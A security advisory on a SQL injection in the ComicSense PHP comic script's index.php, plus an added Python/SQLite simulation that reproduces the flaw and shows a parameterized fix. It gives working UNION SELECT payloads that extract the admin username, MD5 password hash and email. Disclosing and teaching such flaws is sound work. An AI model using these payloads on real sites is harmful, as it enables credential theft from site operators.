Comicsense SQL Injection Advisory/Exploit

ID: 72013
CVE: None
Download vulnerable application: None

by s0cratex
s0cratex (at) hotmail (dot) com

ComicSense is a PHP / MySQL script.
It lets you easily host an online comic
or image shack.
You can download it from

The bug is a common SQL injection in "index.php".

Line 32:
$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
The variable $epi is interpolated into the query without being validated, cast to an integer or quoted, so whoever controls it can append further SQL to the WHERE clause.

Because the injected text lands after "episodenr =", a UNION with the same number of columns as the comic table (the ",1,1" padding makes three) pulls rows out of the users table:

Admin username: UNION SELECT username,1,1 FROM users

MD5 hash of the password: UNION SELECT password,1,1 FROM users

E-mail address: UNION SELECT email,1,1 FROM users
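The following Python/SQLite simulation is an added example and is not code from the advisory or from ComicSense. It rebuilds the line 32 query against a constructed schema, runs the advisory's UNION payloads through it, and contrasts it with a parameterized lookup. The table layouts, the empty $prefix, the "-1" used to empty the legitimate result set and the sample rows are all assumptions made for the demonstration.

```python
import hashlib
import re
import sqlite3

# Assumed stand-in for ComicSense's $prefix (empty here).
PREFIX = ""

# Constructed sample credential; the advisory says passwords are stored as MD5.
ADMIN_MD5 = hashlib.md5(b"password").hexdigest()


def build_db():
    """Constructed in-memory schema mimicking the advisory's comic and users tables.

    The comic table is given three columns because the advisory's payloads pad
    the UNION with ",1,1", and UNION requires equal column counts (assumption).
    """
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE comic (episodenr INTEGER, title TEXT, image TEXT);
        INSERT INTO comic VALUES (1, 'Pilot', 'ep1.png');
        INSERT INTO comic VALUES (2, 'Second', 'ep2.png');
        CREATE TABLE users (username TEXT, password TEXT, email TEXT);
        """
    )
    db.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        ("admin", ADMIN_MD5, "admin@example.com"),
    )
    return db


def lookup_vulnerable(db, epi):
    """Mirrors index.php line 32: attacker-controlled $epi concatenated into SQL."""
    sql = "SELECT * FROM " + PREFIX + "comic WHERE episodenr = " + str(epi)
    return db.execute(sql).fetchall()


def leak_column(db, column):
    """Run the advisory's UNION payload for one users column through the
    vulnerable query. The leading -1 (assumed) matches no real episode, so
    only the UNION rows come back."""
    payload = "-1 UNION SELECT " + column + ",1,1 FROM users"
    return [row[0] for row in lookup_vulnerable(db, payload)]


def is_valid_episode(epi):
    """Hardening step one: accept only a plain decimal integer."""
    return re.fullmatch(r"-?\d+", str(epi).strip()) is not None


def lookup_safe(db, epi):
    """Hardening step two: bind the value as a parameter instead of
    building the statement from strings. Raises ValueError on bad input."""
    if not is_valid_episode(epi):
        raise ValueError("episodenr must be an integer")
    sql = "SELECT * FROM " + PREFIX + "comic WHERE episodenr = ?"
    return db.execute(sql, (int(str(epi).strip()),)).fetchall()


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable, normal use:", lookup_vulnerable(conn, "1"))
    for col in ("username", "password", "email"):
        print("leaked", col + ":", leak_column(conn, col))
    print("safe, normal use:", lookup_safe(conn, "1"))
    print("safe rejects payload:",
          not is_valid_episode("-1 UNION SELECT username,1,1 FROM users"))
```

The vulnerable path returns ('admin', 1, 1) style rows for each payload, exactly the three facts the advisory lists; the parameterized path returns only real episodes and refuses anything that is not an integer.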